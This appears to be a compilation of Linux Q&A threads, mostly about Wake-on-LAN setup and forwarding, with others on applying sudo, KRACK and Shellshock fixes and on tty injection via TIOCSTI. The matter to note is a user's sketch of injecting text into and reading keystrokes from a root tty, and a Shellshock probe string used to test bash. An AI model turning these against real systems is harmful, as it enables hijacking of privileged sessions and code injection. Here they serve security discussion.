|
How to patch sudo vulnerabilities on debian leading to a local privilege escalation CVE-2021-23239 and CVE-2021-3156 (aka Baron Samedit)?
|
This question is like what do a distribution?
Distribution adapt and integrate the packages in the overall distribution, e.g. PATH, manuals, init scripts, logs, cronjob, firewall, etc. Additionally they configure the package to be used and integrated with specific other packages (which crypto library version, which random generator to use, etc.). They adapt also default configuration file.
So there are many changes in the distribution binaries. Additionally there are tests.
The upstream provides the sources and functionalities, and you can take the original sources and compile yourself. But than you need to understand (and read all original document on how to compile and how to install the program). The Linux patch is to be applied on the original sources.
If you know some programming, you can download the sources of your distribution and apply the patch, and build and install the modified packages. Remember to modify the changelog or the build command, in order to have a local version suffix, so you see if you have the original or a patched version.
Open source has the strength to be able to use also such method. But I would not do it first the first time on important programs.
|
I run multiple distributions of Linux. I am researching how to patch against KRACK.
The package that is vulnerable in Linux is 'wpa_supplicant'.
According to the Vendor Responses the "Linux patch" for wpa_supplicant can be found here, whereas the (for example) Fedora patch can be found here and the Debian patch can be found here.
In which circumstances would/could I download and apply the so called "Linux patch" directly? Is that only if I'm using the Linux Kernel directly? Otherwise, if I'm running on a specific distribution of Linux, do I need to wait for a patch from that specific distribution?
Note my question refers to a specific vulnerability (KRACK), but I'm trying to understand generally, what is the difference between what the project puts out (in this case the hostapd and wpa_supplicant project) versus what the different Linux distributions release.
|
Is a package specific to a Linux distribution? How to protect against KRACK
|
Yes, a process can inject input into a tty via the TIOCSTI ioctl. At least on Linux, that's subject to some restrictions: the user should be root (CAP_SYS_ADMIN) or inject into its controlling tty.
That's still quite dangerous, and TIOCSTI was gutted in systems like OpenBSD, but its threat model was usually backwards than that from your question: the root was supposed to use su (or something else) to run a command as an ordinary user, and that command was able to insert keys into the controlling tty it was sharing with its privileged caller. See examples here and here.
Of course, that could also be exploited via a biff(1) or some other program running in the same tty su root was started from, but that's doesn't look that interesting: if an attacker was able to get grip of an account able to su or sudo, there are probably simpler an nicer ways to escalate it.
|
I need some information regarding the possible attack vector on *nix platforms of running su/sudo.
Can an malicious process wait for the user to run su or sudo and then exploit that root access somehow? Or is this already protected somehow?
For example, if /dev/tty2 has impersonated root with su:
# inject text
echo Adding malicious text to a root tty, like Enter Password: > /dev/tty2
# read keystrokes
cat /dev/tty2
# not sure how to write keystrokes or if it is possibleMaybe this is absolutely documented, or protected, if so, please link me the docs.
PS: Please don't shut me down as if I am requesting help to do an exploit. I am not. The question is about the risks of using su/sudo versus logging as root in the context of a discussion about whether should Windows have a sudo command or not. I need to get my facts straight.
|
Can a process send keystrokes or read text to/from a tty that is running su/sudo?
|
Following the comments,I have done this, and am satisfied that I am up-to-date.
[Harry@localhost]~% rpm -qv bash
bash-4.2.48-2.fc20.i686
[Harry@localhost]~% env X='() { (a)=>\' sh -c "echo date"; cat echo
date
cat: echo: No such file or directory
[Harry@localhost]~%
|
The question on this site: "When was the shellshock (CVE-2014-6271/7169) bug introduced, and what is the patch that fully fixes it?" explains how the vulnerability has been cured, but does not, as far as I can see, explain what is necessary for individuals to do on their own computers. Is there any need for further action if yum -y update bash gives No packages marked for update.?
|
Is there any need to take further action over ShellShock [closed]
|
You might have better luck using the tool arping instead. The tool ping works at the layer 3 level of the OSI model, whereas arping works at layer 2.
You still need to know the IP of the system however with this tool. There are 2 versions of it, the standard one included with most Unixes (Alexey Kuznetsov's) is the version that can only deal with IP addresses. The other version (Thomas Habets') supposedly can query using MAC addresses.
$ sudo arping 192.168.1.1 -c 1
ARPING 192.168.1.1 from 192.168.1.218 eth0
Unicast reply from 192.168.1.1 [00:90:7F:85:BE:9A] 1.216ms
Sent 1 probes (1 broadcast(s))
Received 1 response(s)arping works similarly to ping except instead of sending ICMP packets, it sends ARP packets.
Getting a system's IP using just the MAC
Here are a couple of methods for doing the reverse lookup of MAC to IP.nmap
$ nmap -sP 192.168.1.0/24Then look in your arp cache for the corresponding machine arp -an.
fping
$ fping -a -g 192.168.1.0/24 -c 1Then look in your arp cache, same as above.
ping
$ ping -b -c1 192.168.1.255Then look in your arp cache, same as above.
nbtscan (windows only hosts)
$ nbtscan 192.168.1.0/24Doing NBT name scan for addresses from 192.168.1.0/24IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.1.0 Sendto failed: Permission denied
192.168.1.4 MACH1 <server> <unknown> 00-0b-12-60-21-dd
192.168.1.5 MACH2 <server> <unknown> 00-1b-a0-3d-e7-be
192.168.1.6 MACH3 <server> <unknown> 00-21-9b-12-b6-a7
|
I have an NIC card on a Debian machine somewhere. The machine is turned off, but I need to know whether the NIC card is turned on so that I can send a wake-on-lan magic packet later (from another Debian machine) to wake it up. I have the MAC address of the card. Is there any way I can ping the ethernet card by MAC to see whether it is on?
I tried creating an ARP entry:
arp -s 192.168.2.2 00-0c-0d-ef-02-03
ping 192.168.2.2That didn't work, since the NIC card does not have this ip address. So the NIC card would receive the ping request but would not reply to it. Is there any way around this?
I am using the etherwake package to send a wake-on-lan message.
|
Can one ping a NIC by MAC
|
Sending a single packet and waiting for a response is going to be one of the fastest possible ways, and ping is a fine way to do that. In fact, depending on your use case, I'd argue that it's too fast, since it doesn't really tell you if the system is actually doing anything useful, just that the kernel's network subsystem is alive and configured.
But assuming that's good enough, you can make some improvements. First, you could use -W1 to decrease the ping timeout to one second. Second, you could make your script ping the different hosts asynchronously (in a background thread), and check the results as needed rather than waiting.
Alternately, you can re-think the approach and have the remote systems check in somehow when they're up, and if a system hasn't checked in, you can assume it's down.
|
I'm writing a wake on lan script for a set of our lab computers. We have sqlite db with a list of the computer hostnames, IPs, and MACs and currently I ping each of them with '-c1' so it doesn't run endlessly - but even that takes some waiting, is there a quicker way to get answer rather than ping? Using ping seems to slow the script quite a bit as it needs the ping answers to continue.
Thanks much for any suggestions!
|
Faster way than ping for checking if computer online?
|
ethtools will help you, but the hardware must allow your needs.
# ethtool interface | grep Wake-on# ethtool eth0 | grep Wake-on
Supports Wake-on: pumbag
Wake-on: daccording to ArchLinux's wiki :
The Wake-on values define what activity triggers wake up:d (disabled)
p (PHY activity)
u (unicast activity)
m (multicast activity)
b (broadcast activity)
a (ARP activity)
g (magic packet activity)If you need some sort of "Wake-on-incoming-SSH", try
# ethtool -s interface wol u
|
I have been using Wake-on-LAN successfully for many years now for a number of my Linux devices. It works well enough.
However, I also have a Mac Mini at home. I have noticed that it goes to sleep and has two distinct properties separate from any Linux machine I have while asleep:It still responds to ping on the network.
It will wake up automatically upon incoming ssh connection, no Wake-on-LAN required.This 2nd property ends up being really nice: it automatically goes to sleep and saves power when not in use and doesn't require any extra thought to power on when I want to ssh into it. It just wakes up automatically. And after I've logged out, 15 minutes later it will go to sleep again.
My assumption is this is because Apple controls the hardware and software stack. So while industry-wide Wake-on-LAN is a network device feature based on a magic packet (that requires no OS interaction), Mac's magic "wake-on-LAN and also still respond to pings" is because they haven't actually put the whole OS to sleep and/or have a separate network stack still running in sleep mode. But that's just a guess.
I'm curious if anyone has ever seen or implemented this sort of "Wake-on-incoming-SSH" on a Linux machine? Or is this special magic that can be found only on Apple devices where they control hardware-through-software and can do this in a way the rest of the industry can't?
|
Wake-on-LAN via SSH
|
OS X can do this now, as of Snow Leopard. It's made possible through the Sleep Proxy Service. It's pretty much automatic. The only requirement is that you have a second always-on Apple device on your LAN that can act as the sleep proxy. Their current low-power embedded boxes all support this, I believe: Airport, Time Machine, and Apple TV.
In the general case, though, I believe the answer is no. I'm not aware of any other OS that has implemented a service like this. The technology is open source, so there's no reason this couldn't be everywhere eventually. It's probably too new to see widespread adoption just yet.
You might now be asking, why do you need a second Apple box on the LAN?
When a PC is asleep, the kernel — and therefore the network stack — is not running, so there is no code in your OS that can respond to a "magic" packet of the sort you're wishing for.
Wake-on-LAN magic packets aren't handled by the OS. They're recognized by the network interface IC, which responds by sending a signal to the CPU that releases it from the sleep state. It can do this because the IC remains powered up in some sleep states. (This is why the Ethernet link light stays on while a PC is "off" on some machines.)
The reason the Apple technology works is that just before the PC goes to sleep, it notifies the sleep proxy. The sleep proxy then arranges to temporarily accept traffic for the sleeping machine, and if it gets something interesting, it sends a WOL packet to the PC and hands off the traffic it received.
|
I'm looking into installing a file server on my network, for serving data and backups.
I want this machine to be available at all times, but I would rather not keep it on all the time (as to conserve power).
Is it possible to set things up so that the thing automatically suspends (or powers off) after some time and then automatically powers back on when I try to connect to it (using some wake-up on LAN magic, without having to send explicit WOL packets)?
|
How to power off a system but still keep it available on the network
|
socat is a killer utility. Put this somewhere in your init scripts:
socat -u -T1 UDP-LISTEN:1234,fork,range=<ip address of source>/32 UDP-DATAGRAM:255.255.255.255:5678,broadcastSome users have problems with UDP-LISTEN, so using UDP-RECV seems better (warning: could send the broadcast packets in an endless loop):
socat -u UDP-RECV:1234 UDP-DATAGRAM:255.255.255.255:5678,broadcastfork allows socat to keep listening for next packets.
T1 limits thelife of forked subprocesses to 1 second.
range makes socat listen only to packets coming from this source. Assuming this is another computer than the one where socat is running, this helps that socat does not listen to its own broadcast packets which would result in an endless loop.
255.255.255.255 is more general than 192.168.0.255. Allowing you to just copy-paste without thinking about your current network structure. Caveat: this probably sends the broadcasted packets to every interface.As you, I noticed WOL works with whatever port. I wonder if this is reliable. Lots of documents only talk about ports 0, 7 and 9.
This allow to use a non-pivileged port, so you can run socat with user nobody.
Thanks to @lgeorget @Hauke Laging and @Gregory MOUSSAT to have participated to this answer.
|
We need to wake-up some computers on our internal LAN, from the Internet.
We have a somewhat closed router, with very few ways to configure it.
I'd like to use netfilter (iptables) to do this because it doesn't involve a daemon or similar, but other solutions are okay.
What I have in mind: the external computer issues a WOL (Wake-On-LAN) packet to the public IP address (with the correct MAC inside)
the correct port is open on the router (say 1234), redirecting the data to a Linux box
the Linux box transforms the UDP unicast packet into a broadcast packet (exact same content, only destination address is modified to 255.255.255.255 or 192.168.0.255)
the multicast packet comes to every NIC, and the desired computer is now awakeFor that, a very simple netfilter rule is:
iptables --table nat --append PREROUTING --in-interface eth+ --protocol udp --destination-port 1234 --jump DNAT --to-destination 192.168.0.255
Alas netfilter seems to ignore transformation to broadcast. 192.168.0.255 and 255.255.255.255 gives nothing. Also tested with 192.168.0.0 and 0.0.0.0
I used tcpdump to see what happens:
tcpdump -n dst port 1234
13:54:28.583556 IP www.xxx.yyy.zzz.43852 > 192.168.0.100.1234: UDP, length 102and nothing else. I should have a second line like:
13:54:28.xxxxxx IP www.xxx.yyy.zzz.43852 > 192.168.0.255.1234: UDP, length 102
If I redirect to a non-multicast address, everything is okay. I have the 2 expected lines. But obviously this don't work for WOL.
Is there a way to tell netfilter to issue broadcast packets?
Other methods I think about:use iptables to match the desired packets, log them, and use a daemon to monitor the log file and fire the broadcast packet
use iptables to redirect the desired packets to a local daemon, which fires the broadcast packet (simpler)
use socat (how?)
|
Transform a UDP unicast packet into a broadcast?
|
You need something that's capable of sending an Ethernet packet that will be seen by the device you want to wake up.
The ether-wake command in BusyBox is exactly what you're after. If your BusyBox doesn't have it, consider recompiling BusyBox to include it.
If you have a sufficiently “bloaty” netcat (BusyBox can have one of two nc implementations, one of which handles TCP only), you can send a manually crafted UDP packet to the broadcast address of the network segment that the device is connected to.
mac=$(printf '\xed\xcb\xa9\x87\x65\x43') # MAC = ed:cb:a9:87:65:43
wol_packet=$(printf "\xff\xff\xff\xff\xff\xff$mac$mac$mac$mac$mac$mac$mac$mac$mac$mac$mac$mac$mac$mac$mac$mac")
echo "$wol_packet" | nc -u 7 192.0.2.255Another BusyBox utility that you could abuse into sending that packet is syslogd.
syslogd -n -O /dev/null -l 0 -R 192.0.2.255/7 &
syslogd_pid=$!
logger "$wol_packet"
kill $!If the MAC contains a null byte, you won't be able to craft the packet so easily. Pick a byte that's not \xff and that's not in the MAC, say \x42 (B), and pipe through tr.
echo "$wol_packet" | tr B '\000' | nc -u 7 192.0.2.255If you really have bash (which is extremely unusual on devices with BusyBox — are you sure you really have bash, and not another shell provided by BusyBox?), it can send UDP packets by redirecting to /dev/udp/$hostname/$port.
echo "$wol_packet" >/dev/udp/192.0.2.255/7
|
Is it possible to implement the wake-on-lan magic packet in bash? I'm using a old, customized BusyBox and don't have ether-wake. Is it possible to replace it with some other shell command, like:
wakeonlan 11:22:33:44:55:66
|
Wake-on-LAN with BusyBox?
|
A WoL magic packet can be sent either to UDP port 0, 7, or 9 (depending on the hardware in use) or as a raw Ethernet packet of type 0x0842. wolcmd has elected to use the former method, defaulting to port 7.
Note that wolcmd does support UDP broadcast, meaning that you can specify 255.255.255.255 as the address and mask if your hardware and network support TCP/IP broadcasts. The magic packet will only be interpreted by the machine whose MAC address it contains; all others will ignore it.
|
I have a new GNU/Linux Debian 9 server installation.
This is what I get from ethtool:
root@web-server:~# ethtool enp2s0
Settings for enp2s0:
Supported ports: [ TP MII ]
Supported link modes: 10baseT/Half 10baseT/Full
100baseT/Half 100baseT/Full
1000baseT/Half 1000baseT/Full
Supported pause frame use: No
Supports auto-negotiation: Yes
Advertised link modes: 10baseT/Half 10baseT/Full
100baseT/Half 100baseT/Full
1000baseT/Half 1000baseT/Full
Advertised pause frame use: Symmetric Receive-only
Advertised auto-negotiation: Yes
Link partner advertised link modes: 10baseT/Half 10baseT/Full
100baseT/Half 100baseT/Full
1000baseT/Full
Link partner advertised pause frame use: Symmetric Receive-only
Link partner advertised auto-negotiation: Yes
Speed: 1000Mb/s
Duplex: Full
Port: MII
PHYAD: 0
Transceiver: internal
Auto-negotiation: on
Supports Wake-on: pumbg
Wake-on: g
Current message level: 0x00000033 (51)
drv probe ifdown ifup
Link detected: yesSo, you see the Magic Packet is on (Wake-on: g).I am waking this computer from power off state like this:
./wolcmd 00********** 192.168.0.104 255.255.255.0 7 # I've hidden the MAC address herefrom Cygwin on Windows 10 using Depicus Wake On Lan Command Line.What I do not understand is, why I need to specify the IP address and mask or port number?
Why is MAC address not enough? Could anyone elaborate...
|
Why am I required to use an IP address when Waking-on-LAN a computer?
|
You can check the setting for an interface, say eth0, with ethtool:
$ sudo ethtool eth0 | grep Wake
Supports Wake-on: pumbg
Wake-on: gFrom the ethtool man page you can disable it with
$ sudo ethtool -s eth0 wol dWhere this gets configured depends on what you use to start your network.
archlinux gives some examples (for turning it on, but the reverse should be clear) for netctl, systemd, nmcli (NetworkManager), and udev.
|
Windows also has Wake on Lan that allows a computer to be woken up from sleep; additionally, this can be disabled by a user on said computer.
I know that WoL exists on Linux, but how does one disable it?
|
How to disable Wake on Lan
|
Manually testing using etherwake
I think you can test it using a tool like etherwake. Depending on the distro it's called etherwake on Ubuntu/Debian, ether-wake on RHEL/CentOS/Fedora. I had it installed already by default on Fedora, it's part of the net-tools package.
To use it:
# Redhat
$ ether-wake 00:11:22:33:44:55# Debian/Ubuntu
$ etherwake 00:11:22:33:44:55To confirm that a server support WOL:
$ ethtool eth0Settings for eth0:
Supported ports: [ ]
Supported link modes:
Supports auto-negotiation: No
Advertised link modes: Not reported
Advertised auto-negotiation: No
Speed: 100Mb/s
Duplex: Full
Port: MII
PHYAD: 1
Transceiver: internal
Auto-negotiation: off
Supports Wake-on: g
Wake-on: g
Link detected: yesThe "Supports Wake-on: g" and "Wake-on: g" tell you that the card is configured for WOL support. If it's missing you can add it to the ifcfg-eth0 config. file like so:
ETHTOOL_OPTS="wol g"Using hwinfo
I noticed that if you look through the hwinfo there are messages regarding how the system came out of power save mode. Also there are messages related to the ethernet device coming up. For example:
<6>[721194.499752] e1000e 0000:00:19.0: wake-up capability disabled by ACPI
<7>[721194.499757] e1000e 0000:00:19.0: PME# disabled
<7>[721194.499831] e1000e 0000:00:19.0: irq 46 for MSI/MSI-X
<6>[721194.574306] ehci_hcd 0000:00:1a.0: power state changed by ACPI to D0
<6>[721194.576330] ehci_hcd 0000:00:1a.0: power state changed by ACPI to D0Here are some other messages a little while later:
<6>[721197.226679] PM: resume of devices complete after 3162.340 msecs
<7>[721197.226861] PM: Finishing wakeup.
<4>[721197.226862] Restarting tasks ... done.
<6>[721197.228541] video LNXVIDEO:00: Restoring backlight stateThe idea would be that maybe there are some messages here related to how the system came up (WOL or power switch). You could add a script that runs as part of a udev event that could grep through the hwinfo output to see if messages are present for WOL vs. powerswitch. Just a idea at this point.
ReferencesHowTo: Wake Up Computers Using Linux Command [ Wake-on-LAN ( WOL ) ]
ether-wak man page
|
Is there any (reliable) way to find out if the PC booted because of a Wake-on-LAN Packet instead of pressing the power button? I want automatically check if WOL is correctly configured.
I know about ethtool's WOL output, but this just tells me if WOL is turned on, not how the PC booted, right?
|
Find out if computer started via Wake-on-LAN or power button?
|
No, ssh has nothing to do with MAC addresses. If you are using DHCP you can maybe look into the logs or configuration files to determine the mac address.
|
I have machine at the office which is shut off I was hoping to turn it on from home using wake on lan. Reading about this, I have realized that I need the MAC address of the machine. Is there a way to find the MAC address of the machine from my ssh connection history?
I use an RSA key to connect to the machine.
|
Is there a way to find the mac address of a remote machine I have connected to with ssh?
|
Wake on LAN is a BIOS and NIC feature, not an OS feature, that is, you need a supporting BIOS and NIC to do it.
Once you've enabled it in your BIOS (if you can), you can check if your NIC has WOL support enabled by checking the output of ethtool [interface].
If the value of Supports Wake-on contains g, your NIC supports WOL magic packets.
To check if it is actually enabled, take a look at the value of Wake-on. If it contains g, your NIC has magic packet support enabled.
If it isn't enabled, run the following:
ethtool -s [interface] wol gYou'll have to issue this command every time your system starts, so add it to the appropriate place. In Ubuntu, perhaps the best place would be as an up rule in /etc/network/interfaces, or the equivalent for your network manager.
|
I was wondering if it were posible to make my server go to sleep after a set period of time, but still be listening for lan requests. I use my server as a media server that might get used 3 or 4 hours a day and it is really a waste of power to have it running all the time. However I don't want to run up to the second floor to switch it on when we want to watch a movie. I saw a few posts about stopping this from happening but how do you enable it?
|
lts is there a way to enable sleep mode and wake on lan?
|
With ngrep, you can do this:
ngrep '\xff{6}(.{6})\1{15}'That matches 0xff 6 times, followed by any 6 bytes, followed by those same 6 bytes repeated 15 more times. I confirmed that matches a packet generated by wakeonlan.
ngrep has options that are useful for scripting (e.g., -W single to have a single line per matched packet, -l to defeat buffering, -t for timestamps, -q to silence other output).
|
I want to listen for WOL (Wake-On-LAN) packets.
As WOL packets can be UDP/TCP/whatever (yes, even TCP, but probably useless), I have to check every incomming packets for the WOL specific pattern.
This can't be done directly with netfilter because the pattern is 6xFF + 16xtarget-MAC-address (so we have 96 variable bytes).
The tools I found can detect lots of protocols, but none are able to detect WOL.
Do you know a simple way to inspect every packets and run a script when a specific pattern is detected?
|
Deep packets inspection to detect WOL
|
A tool that will handle the majority of this is arpwatch. By default (on Debian, at least) is that it writes to /var/lib/arpwatch/arp.dat. This file is flushed and updated each time arpwatch is stopped.
The file contains entries of this form:
52:54:00:aa:bb:cc 192.168.1.2 1452252063 somehostname eth0The /etc/ethers file requires only the MAC address and either the IP address or resolvable hostname:
52:54:00:aa:bb:cc 192.168.1.2It is then quite straightforward to keep /etc/ethers updated and in sync with a small script, run daily from crontab:
#!/bin/bash# Flush arp.dat
service arpwatch restart# Save a copy
test -f /etc/ethers || touch /etc/ethers
cp -fp /etc/ethers /etc/ethers.old# Check to see if anything new has arrived. If so rebuild the file
(
echo '# This file is updated automatically from /var/lib/arpwatch/arp.dat'
echo '# Take care when editing'
echo '#'
(
awk '{print $1,$2}' /var/lib/arpwatch/arp.dat
grep -v '^#' /etc/ethers.old
) |
sort -u
) >/etc/ethers.tmp# Update ethers with the new file
cmp -s /etc/ethers.tmp /etc/ethers || cat /etc/ethers.tmp >/etc/ethers
rm -f /etc/ethers.tmp# All done
exit 0
|
is there a tool/daemon available that automatically fills /etc/ethers in the background with the proper hostname:mac pairs to have a up to date database when needed with for example wake on lan (wol) ? maybe something that does not "scan" the network, but cassually dumps the arp cache or something ?
thanks
|
is there a tool/daemon that automatically fills /etc/ethers in the background to have a proper wake on lan hostname:mac database when needed?
|
The issue of waking an host is that to send it a packet, the network stack must know the MAC address of the NIC. Normally it's dynamically handled by ARP. If the MAC entry has been evicted from the router's ARP table, when the host is asleep it can't answer the ARP query, thus the router can't get the MAC address needed to reach the sleeping host to send it the WOL Magic Packet™ even if such packet includes 16 times this MAC address in its payload.
Here are two methods to overcome this relying only on the network stack (and companions like iptables or tc).
Permanent ARP
Since there is control on the router, one can set a permanent ARP entry on the router for the sleeping host. That way the previous problem will never happen. The router can now send or forward easily a WOL Magic Packet™ without having to use any broadcast anywhere. With NAT to "port forward", a remote host can then use the wakeonlan command (rather than the etherwake command, because it can change the UDP port).
The sleeping host thus needs a static address (or one with a permanent DHCP lease). Let's say the WAN address on the router is 192.0.2.2 on wan0, the LAN side on the router is 192.168.1.1/24 on interface lan0 and the sleeping host 192.168.1.101/24 on an interface with MAC address 12:34:56:78:9a:bc.
On the router:
ip neighbour replace 192.168.1.101 lladdr 12:34:56:78:9a:bc dev lan0 nud permanentAs it's unclear if the packet received by the NIC will be consumed or still correctly made available to the waking host, it's traditionally port 9 that has been chosen because that's the discard service in case it's "running" and either would be the same. Pick an other port than 9 if needed. This port on the sleeping host should be preferably unused and firewalled (packets dropped), or actually running the discard service. As one port maps to one target, if there are multiple WOL hosts, each should have a different port.
The issue of a first packet arriving elsewhere in OP's description is worked around by selecting all interfaces that aren't the lan0 interface.
So still on the router, using iptables, do the DNAT and allow the redirected packet:
iptables -t nat -I PREROUTING ! -i lan0 -p udp --dport 9 -j DNAT --to-destination 192.168.1.101
iptables -I FORWARD -m conntrack --ctstate DNAT -d 192.168.1.101 -j ACCEPTA remote host on Internet can now do this to wake the sleeping host:
wakeonlan -i 192.0.2.2 -p 9 12:34:56:78:9a:bcSystem integration depends on the method used for network configuration. For example if it's configured with interfaces and ifupdown, the two iptables commands could be added as pre-up commands in the iface lan0 ... stanza (and deleted in a down command), and the ip neighbour as up command.Directed subnet broadcast (since kernel 4.19)
Tools always have options to use broadcast packets which end up as broadcast Ethernet frames that will reach all hosts, including the target host.
This can be done when routing but there are more risks involved (including participating in reflected attacks). Ponder security before using.
The directed subnet broadcast must be enabled globally and on the receiving WAN interface (not the target LAN interface). If there are possibly multiple WAN interfaces (OP describes packets arriving first on an interface, then an other), enable it on all involved.
sysctl -w net.ipv4.conf.all.bc_forwarding=1
sysctl -w net.ipv4.conf.wan0.bc_forwarding=1Add NAT and FORWARD rules:
iptables -t nat -I PREROUTING ! -i lan0 -p udp --dport 9 -j DNAT --to-destination 192.168.1.255
iptables -I FORWARD -m conntrack --ctstate DNAT -d 192.168.1.255 -j ACCEPTAnd as an option to limit risks, finally convert the IPv4 Ethernet frame (ethertype 0x800) into the de facto ethertype 0x842 used for WOL using tc, so the result will be ignored by network stacks (but not by WOL NICs). One could have used a mark set by iptables, or here just consider IP destination and UDP destination port 9. Former method would have clashed with marks if used by Untangle, either method will clash anyway if Untangle uses tc for QoS.
tc qdisc add dev lan0 root handle 1: prio # simple classful qdisc used only to enable filters
tc filter add dev lan0 parent 1: protocol ip basic match '
cmp (u32 at 16 layer network eq 0xc0a801ff) and
cmp (u8 at 9 layer network eq 17) and
cmp (u16 at 2 layer transport eq 9)
' action skbmod set etype 0x842Above,u32 at 16 layer network eq 0xc0a801ff means IP address destination 192.168.1.255,
u8 at 9 layer network eq 17 means UDP,
u16 at 2 layer transport eq 9 means destination port 9.
and the resulting action is to change the ethertype to 0x842Likewise a remote host on Internet can now do this to wake the sleeping host:
wakeonlan -i 192.0.2.2 -p 9 12:34:56:78:9a:bcbut it will target the whole LAN each time, so keeping the same port and just changing the MAC address is good enough when there are multiple sleeping WOL hosts.Other method to consider:
fwknopd installed on the server and fwknop installed on the client implement an encrypted single packet authorization mechanism to trigger commands. It could be used to trigger running wakeonlan/etherwake on the router.
|
I have an untangle box (debian 10 underneath) that I am attempting to forward a WOL packet from a host in one subnet to a host in another subnet.
My initial solution to this was to use knockd, listen for a syn packet on one of its interfaces on one subnet, then execute a etherwake command on the other subnet to wake up the host. I would send the syn packet using netcat from a linux server in the first subnet, sending the packet to the gateway IP (the untangle box).
Problem is, the traffic destined for the FW itself are processed initially in on unaddressed vlan interface. Its a bit weird, the syn packet is only seen on unaddressed interface, then all other packets are seen on the actual addressed vlan interface. I have confirmed this with tcpdump.
It breaks my plan on using knockd, because knockd refuses to listen on interfaces without an IP address.
I can see the syn packet coming into the unaddressed interface with tcpdump, and knockd uses tcpdump under the hood. So is there a way to force knockd to listen on an unaddressed interface anyways?
If knockd is just completely out of the question, how would you implement a WOL packet forwarder on Debian 10?
|
Debian Wake on LAN Packet Forwarding?
|
I am replying to this message because I was struggling with the same issue.
The problem seems to lie in the etherwake path. Crontab runs commands by default in /bin. But etherwake is located in sbin.
/usr/sbin/etherwakeSo instead of doing:
00 06 * * * etherwake -i wlan0 00:11:22:33:44:55The proper way is:
00 06 * * * /usr/sbin/etherwake -i wlan0 00:11:22:33:44:55This seemed to do the trick for me. Some other people struggling with the same issue have reported that wakeonlan:
sudo apt-get install wakeonlansolves the problem as well.
|
I wrote a small application, which runs etherwake. From bash it works fine and wakes up another PC. But if it is launched from crontab, then nothing happens.
Has anyone encountered a similar problem and how to solve it?
Note: Maybe it matters, that the app is written with Qt/C++, etherwake runs via QProcess and OS is Raspbian on Raspberry Pi Zero.
|
Cron and etherwake on Raspbian
|
After experimenting with the BIOS settings I finally was able to get Linux to boot using WoL! Apparently I had to enable both Power On By PCI Devices and Power On By PCIE Devices for it to boot under Linux using WoL. To be sure that was the cause I tried all combinations.Just to be thorough I tried disabling them both to see whether that would make it impossible to resume using WoL, which it did, because it made it impossible to set the Wake-on flag to g, as was to be expected.
When enabling either of them I was able to resume using WoL, but unable to boot using WoL.
When enabling them both I was able to both resume and boot using WoL.Under Windows, after enabling the driver settings to Wake From Shutdown, it was only able to boot using WoL when Power On By PCIE Devices was enabled. Enabling Power On By PCI Devices made no impact. After changing these driver settings, Windows was no longer able to go into sleep mode. The reason for this was that the Ethernet device was added to the list of devices that are allowed to wake Windows. After disabling the Ethernet device from waking Windows through the power configuration, Windows was again able to go into sleep mode.
|
I am trying to get Wake-on-LAN (WoL) to work on my desktop. It has an Asus P6T Deluxe v2 motherboard and I have successfully enabled the WoL option within the BIOS power management [1]. The desktop is currently configured as a dual boot of Windows 7 and Arch Linux. On Windows 7 I am able to boot using WoL, but on my Arch Linux I only got resume to work using WoL. I followed the instructions on the Arch Linux wiki page about WoL [2]. What do I have to configure on Linux to make it possible to boot using WoL as well?
All the tutorials about WoL on Linux I have been able to find, only describe how to enable it using ethtool and how to generate a magic package from another device, but none that I could find that would explain how to make sure you can boot using WoL.
From a post on Ask Ubuntu [3] I deduced that it probably has something to do with enabling /proc/acpi/wakeup for my Ethernet card. I tried enabling it using echo POP6 > /proc/acpi/wakeup which unfortunately did not enable it. When I tried it for a USB device, e.g. USB3, it did toggle correctly between being enabled and disabled.
Am I on the right track, with enabling my Ethernet card using /proc/acpi/wakeup or is it irrelevant to enabling Linux to boot using WoL? And if I should enable it, what is the correct way to enable it for my Ethernet card?http://blog.controlspace.org/2009/09/wake-on-lan-with-windows-7-and-asus-p6t.html
https://wiki.archlinux.org/index.php/Wake-on-LAN
https://askubuntu.com/questions/352888/wake-on-lan-13-04-problemsIn the case I made a bad assumption, this is how I assumed POP6 is my Ethernet device.
Executing lspci -tv gave me:
-+-[0000:ff]-+-00.0 Intel Corporation Xeon 5500/Core i7 QuickPath Architecture Generic Non-Core Registers
| +-00.1 Intel Corporation Xeon 5500/Core i7 QuickPath Architecture System Address Decoder
| +-02.0 Intel Corporation Xeon 5500/Core i7 QPI Link 0
| +-02.1 Intel Corporation Xeon 5500/Core i7 QPI Physical 0
| +-03.0 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller
| +-03.1 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Target Address Decoder
| +-03.4 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Test Registers
| +-04.0 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 0 Control Registers
| +-04.1 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 0 Address Registers
| +-04.2 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 0 Rank Registers
| +-04.3 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 0 Thermal Control Registers
| +-05.0 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 1 Control Registers
| +-05.1 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 1 Address Registers
| +-05.2 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 1 Rank Registers
| +-05.3 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 1 Thermal Control Registers
| +-06.0 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 2 Control Registers
| +-06.1 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 2 Address Registers
| +-06.2 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 2 Rank Registers
| \-06.3 Intel Corporation Xeon 5500/Core i7 Integrated Memory Controller Channel 2 Thermal Control Registers
\-[0000:00]-+-00.0 Intel Corporation 5520/5500/X58 I/O Hub to ESI Port
+-01.0-[01]--
+-03.0-[02]--+-00.0 Advanced Micro Devices, Inc. [AMD/ATI] Cypress PRO [Radeon HD 5850]
| \-00.1 Advanced Micro Devices, Inc. [AMD/ATI] Cypress HDMI Audio [Radeon HD 5800 Series]
+-07.0-[03]--
+-14.0 Intel Corporation 7500/5520/5500/X58 I/O Hub System Management Registers
+-14.1 Intel Corporation 7500/5520/5500/X58 I/O Hub GPIO and Scratch Pad Registers
+-14.2 Intel Corporation 7500/5520/5500/X58 I/O Hub Control Status and RAS Registers
+-14.3 Intel Corporation 7500/5520/5500/X58 I/O Hub Throttle Registers
+-1a.0 Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #4
